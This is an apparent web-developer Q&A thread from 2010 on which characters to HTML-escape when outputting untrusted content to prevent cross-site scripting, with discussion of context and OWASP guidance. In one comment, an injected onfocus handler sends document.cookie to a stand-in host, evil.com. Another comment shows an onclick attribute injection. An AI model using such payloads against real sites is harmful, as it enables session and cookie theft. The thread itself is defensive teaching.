What are the characters that are required and suffice when escaping user-generated content before output? (in other words: what are the characters web developers should escape when outputting text that previously came from an untrusted, anonymous source?)
+4
A:
When echoing to a page, you should encode
- '&' (ampersand) becomes '
&
'- '"' (double quote) becomes '
"
'- ''' (single quote) becomes '
'
'- '<' (less than) becomes '
<
'- '>' (greater than) becomes '
>
'
From PHP's htmlspecialchars()
docs.
Note that the context also matters.
You'll also need to take the character set into account.
alex
2010-06-22 10:41:10
What's the reason and/or need to escape quotes?
ChrisW
2010-06-22 10:42:26
In case the text goes into an <input> tag, where it's placed in the value attribute, enclosed in quotes.
Alexander
2010-06-22 10:43:48
@ChrisW I echo your name here `<input name="name" value="<?php echo $name; ?>">`. Now what if I entered my name as `alex" onfocus="window.location = 'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)`
alex
2010-06-22 10:44:22
Thanks for your reply.
ChrisW
2010-06-22 10:47:05
I also recommend escape anything that is not [a-zA-Z0-9]. Browsers will be able to represent properly and is not going to take you too much effort to implement it.
Pedro Laguna
2010-06-22 11:16:43
@Pedro Laguna - If you mean for accented letters, etc., why not serve it as UTF?
ChrisW
2010-06-22 11:23:36
@ChrisW no, I mean : ; , . / \ + = _ - # ! etc. You never know what the bad guys are going to discover to execute Javascript ;)
Pedro Laguna
2010-06-22 11:30:18
@Pedro You mean you never know how IE can be tricked into executing JavaScript... I mean have you seen how the Samy worm was made? http://namb.la/popular/tech.html
alex
2010-06-22 12:05:04
This answer is not what I wanted nor what I expected, but it is the most insightful one because it made me realize that the question is incomplete. Thank you, @alex
Tom
2010-06-22 12:59:56
@alex yes, I read (and understand) the Samy code and the java\nsript trick. But other tricks can be discovered in other browsers too: http://sla.ckers.org/forum/read.php?24,33938,page=1
Pedro Laguna
2010-06-22 13:28:27
@Pedo I know, I was just having a joke at IE's expense :D
alex
2010-06-22 13:46:05
There are more characters, it all depends on where in the page input is displayed. For example if it is displayed inside JavaScript tags (<script></script>) or in CSS you have to worry about other characters. Check this link (Why Can't I Just HTML Entity Encode Untrusted Data?): http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
fms
2010-06-22 13:46:22
@Pedro Wow, tested a few of them in my console and they are working with Firefox 3.6.3. Scary stuff... thanks for the link.
alex
2010-06-22 13:48:48
A:
I think that escaping the < > & " '
symbols should be enough for any scenario.
Alexander
2010-06-22 10:42:50
These characters are not enough in some scenarios. Imagine the following code: <input type="text" value="asdf\" onclick=alert(document.domain); a=\""> Simply scape the double quotes does not helps you :)
Pedro Laguna
2010-06-24 13:54:06
A:
Maybe this will help you
http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php
hex
2010-06-22 10:43:06
Thanks, but that is a complete list. I don't want to escape everything, I want to escape as little as possible/needed.
Tom
2010-06-22 12:35:16